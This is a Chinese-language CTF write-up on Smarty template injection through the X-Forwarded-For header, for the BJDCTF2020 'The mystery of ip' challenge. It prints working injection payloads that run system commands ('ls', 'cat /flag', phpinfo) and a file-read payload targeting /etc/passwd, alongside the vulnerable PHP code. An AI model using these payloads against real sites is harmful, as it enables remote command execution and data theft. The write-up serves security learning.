【Smarty模板注入】BJDCTF2020 The mystery of ip WriteUp

本文最后更新于:2021年8月18日下午1点46分

题目地址:

题目地址:[BUUCTF (buuoj.cn)](https://buuoj.cn/challenges#[BJDCTF2020]The mystery of ip)

题目环境:The_mystery_of_ip (buuoj.cn)


WriteUp:

打开题目,页面如下

image-20210522171357599

一共三个页面,分别是index.phpflag.phphint.php

其中flag.php的页面如下

image-20210522171440934

hint.php页面中给出的hint为:

image-20210522171540276

猜测,flag.php页面中的IP是通过XFF中获取的

使用Hackbar修改XFF参数

image-20210522171714274

修改之后,页面回显如下

image-20210522171732705

猜测在这里存在SSTI模板注入

修改XFF的值

image-20210522171834306

页面回显如下:

image-20210522171911212

尝试执行系统命令

X-Forwarded-For: {{system('ls')}}

image-20210522172006507

页面回显如下:

image-20210522172053091

读取/目录下的flag

X-Forwarded-For: {{system('cat /flag')}}

image-20210522172139516

得到flag

image-20210522172211278

flag为:flag{47b281d0-12b3-4eb3-a28c-284df2a84183}


Smarty模板注入:

Smarty模板介绍:

Smarty是基于PHP开发的,对于Smarty的SSTI的利用手段与常见的flask的SSTI有很大区别。

漏洞确认:

一般情况下输入{$smarty.version}就可以看到返回的smarty的版本号。

image-20210522182221522

该题的版本号为3.1.34

image-20210522182231632

常规利用方式:

Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令,最常规的思路自然是先测试该标签。但就该题目而言,使用{php}{/php}标签会报错:

image-20210522182455505

image-20210522182509038

在Smarty3的官方手册里有以下描述:

Smarty已经废弃{php}标签,强烈建议不要使用。在Smarty 3.1,{php}仅在SmartyBC中可用。

{literal} 标签:

{literal}可以让一个模板区域的字符原样输出。 这经常用于保护页面上的Javascript或css样式表,避免因为Smarty的定界符而错被解析。

那么对于php5的环境我们就可以使用

1
2
3
<script language="php">phpinfo();</script>

// 从PHP7开始,这种写法<script language="php"></script>,已经不支持了

来实现PHP代码的执行,但这道题的题目环境是PHP7,这种方法就失效了。

静态方法:

通过self获取Smarty类再调用其静态方法实现文件读写被网上很多文章采用。

Smarty类的getStreamVariable方法的代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
public function getStreamVariable($variable)
{
$_result = '';
$fp = fopen($variable, 'r+');
if ($fp) {
while (!feof($fp) && ($current_line = fgets($fp)) !== false) {
$_result .= $current_line;
}
fclose($fp);
return $_result;
}
$smarty = isset($this->smarty) ? $this->smarty : $this;
if ($smarty->error_unassigned) {
throw new SmartyException('Undefined stream variable "' . $variable . '"');
} else {
return null;
}
}

可以看到这个方法可以读取一个文件并返回其内容,所以我们可以用self来获取Smarty对象并调用这个方法,很多文章里给的payload都形如:{self::getStreamVariable(“file:///etc/passwd”)}

但是在这一题,并不能使用,该题版本号为3.1.34,而Smarty在3.1.30的版本中国就将该静态方法删除,因此无法使用那些文章所使用的通用payload来解这道题。

{if}标签

Smarty的{if}条件判断和PHP的if非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if},也可以使用{else} 和 {elseif},全部的PHP条件表达式和函数都可以在if内使用,如||, or, &&, and, is_array(), 等等,如:{if is_array($array)}{/if}

既然全部的PHP函数都可以使用,那么我们是否可以利用此来执行我们的代码呢?

XFF头改为{if phpinfo()}{/if},可以看到题目执行了phpinfo()

image-20210522183330938

image-20210522183340817

因此,这题的payload可以为{if system('cat /flag')}{/if},这样同样可以获得flag

image-20210522183702513

image-20210522183711931

题目漏洞代码:

简化后如下

1
2
3
4
5
6
<?php
require_once('./smarty/libs/' . 'Smarty.class.php');
$smarty = new Smarty();
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
$smarty->display("string:".$ip); // display函数把标签替换成对象的php变量;显示模板
}

可以看到这里使用字符串代替smarty模板,导致了注入的Smarty标签被直接解析执行,产生了SSTI。

参考文章: